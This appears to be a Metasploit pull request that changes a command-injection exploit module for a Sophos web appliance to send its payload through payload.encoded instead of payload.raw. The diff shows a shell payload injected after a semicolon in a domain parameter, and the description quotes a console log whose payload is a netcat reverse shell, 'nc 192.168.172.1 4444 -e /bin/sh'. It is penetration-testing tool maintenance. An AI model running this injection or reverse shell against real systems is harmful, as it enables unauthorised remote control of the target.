### PR TITLE
Use payload.encoded because BadChars are defined

### DIFF
--- a/modules/exploits/linux/http/sophos_wpa_sblistpack_exec.rb
+++ b/modules/exploits/linux/http/sophos_wpa_sblistpack_exec.rb
@@ -85,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote
   def exploit
     print_status("#{rhost}:#{rport} - Executing payload...")
     url = "http://www.#{rand_text_alpha(10 + rand(10))}.com"
-    domain = "http://#{rand_text_alpha(10 + rand(10))}.com;#{payload.raw}"
+    domain = "http://#{rand_text_alpha(10 + rand(10))}.com;#{payload.encoded}"
     # very short timeout because the request may never return if we're
     # sending a socket payload
     send_exploit_query(url, domain, 0.01)


### PR DESCRIPTION
As @jlee-r7 and @hmoore-r7 have taught me, payload.raw shouldn't be needed if BadChars alre well defined, as is the case. I guess I was experiencing issues on my testings because I had BadChars incomplete, or maybe a typo I fixed after switch to payload.raw

By adding a print_status for payload.encoded and payload.raw at the starting of exploit method, indeed there isn't encoding due to badchars

```
msf exploit(sophos_wpa_sblistpack_exec) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] payload.raw: nc 192.168.172.1 4444 -e /bin/sh 
[*] payload.encoded: nc 192.168.172.1 4444 -e /bin/sh 

```
